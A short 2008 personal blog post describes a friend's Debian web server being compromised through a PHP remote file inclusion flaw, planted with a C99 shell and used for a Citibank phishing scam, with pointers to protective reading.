Posts Tagged ‘security’

website hacked and used for phishing scam

November 26, 2008 2 comments

Yesterday one of my friend called me up and said, “hey, I am in a big trouble, don’t know when (probably few days earlier) some one hacked my website and used it for Citibank phishing scam, and today I got an email from domain registrar that the domain name is suspended, because their had been several complaints of spam and citibank scam, can you please login to my server and analyse logs and inspect when and how all this happened”.

It was a horrible news for me because it was me who helped him setting up Apache virtual hosts, ftp and other stuff on his server, it’s a dedicated server with Debian Etch 4.0 running on it, after inspecting Apache logs it broke out to me that his server was poisoned with a C99 shell script, this script was injected due to a remote file inclusion vulnerability in his PHP code, for those who don’t know much about what is C99 and how Remote File Inclusion works,  check this link.

It’s really ridiculous if your website get hacked and is being used for a scam, so after a little search i found some interesting articles/posts explaining possible ways to protect your website from such vulnerabilities. If you are running a  website you must check out these links

more over, i will greatly appriciate if you have any advice/tips/story to share 🙂